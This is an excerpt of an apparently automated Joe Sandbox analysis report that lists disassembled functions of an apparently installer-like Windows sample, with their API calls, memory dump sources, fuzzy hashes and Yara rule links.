                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3711407533-0
                                                                                                                                                                                                                                  • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                                                                                                                                                                  • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00416B42 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                                                                                                                                                                                                  • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Color$CallMessageProcSendTextWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 601730667-0
                                                                                                                                                                                                                                  • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                                                                                                                                                                  • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00454F7C Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4071923889-0
                                                                                                                                                                                                                                  • Opcode ID: e6feda7d3358a80d2693463bb1cb51aaf78648cef31b4280cf5022ab190105ae
                                                                                                                                                                                                                                  • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6feda7d3358a80d2693463bb1cb51aaf78648cef31b4280cf5022ab190105ae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004230C8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0042311E
                                                                                                                                                                                                                                  • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CapsDeviceEnumFontsRelease
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2698912916-0
                                                                                                                                                                                                                                  • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                                                                                                                                                                  • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004019CC Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                                                                                                                                  • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 730355536-0
                                                                                                                                                                                                                                  • Opcode ID: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                                                                                                                                                                  • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040626C Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                                                                                                                                                                  • GlobalUnWire.KERNEL32(00000000), ref: 00406276
                                                                                                                                                                                                                                  • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                                                                                                                                                                  • GlobalFix.KERNEL32(00000000), ref: 00406281
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Global$AllocHandleWire
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2210401237-0
                                                                                                                                                                                                                                  • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                                                                                                                                                                  • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0045C264 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                                                                                                                                                  • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • NumRecs range exceeded, xrefs: 0045C396
                                                                                                                                                                                                                                  • EndOffset range exceeded, xrefs: 0045C3CD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$BuffersFlush
                                                                                                                                                                                                                                  • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                                                                                                                                                                  • API String ID: 3593489403-659731555
                                                                                                                                                                                                                                  • Opcode ID: 801dcd038e335b265826125cf8ff6a7c252aa7dfa969982b1ed0869fe0f6d4ae
                                                                                                                                                                                                                                  • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 801dcd038e335b265826125cf8ff6a7c252aa7dfa969982b1ed0869fe0f6d4ae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00498BA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                                                                                                                                                                    • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                                                                                                                                                                    • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                                                                                                                                                                    • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                                                                                                                                                    • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                                                                                                                                                    • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                                                                                                                                                    • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                                                                                                                                                                    • Part of subcall function 004063C4: 6F571CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                                                                                                                                                                                    • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                                                                                                                                                                    • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                                                                                                                                                                                    • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                                                                                                                                                                    • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                                                                                                                                                                    • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                                                                                                                                                                                    • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                                                                                                                                                                    • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                                                                                                                                                                    • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                                                                                                                                                                    • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                                                                                                                                                                    • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                                                                                                                                                                    • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                                                                                                                                                                    • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                                                                                                                                                                    • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                                                                                                                                                                    • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                                                                                                                                                                    • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                                                                                                                                                                    • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                                                                                                                                                                    • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                                                                                                                                                    • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                                                                                                                                                                                    • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                                                                                                                                                                    • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                                                                                                                                                                    • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                                                                                                                                                                    • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                                                                                                                                                                                    • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF571FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                                                                                                                                                                  • String ID: Setup
                                                                                                                                                                                                                                  • API String ID: 3527831634-3839654196
                                                                                                                                                                                                                                  • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                                                                                                                                                  • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042DC00 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                                                                                  • String ID: $=H
                                                                                                                                                                                                                                  • API String ID: 3660427363-3538597426
                                                                                                                                                                                                                                  • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                                                                                                                                                                  • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00453A24 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                  • String ID: .tmp
                                                                                                                                                                                                                                  • API String ID: 1375471231-2986845003
                                                                                                                                                                                                                                  • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                                                                                                                                                  • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00483F88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
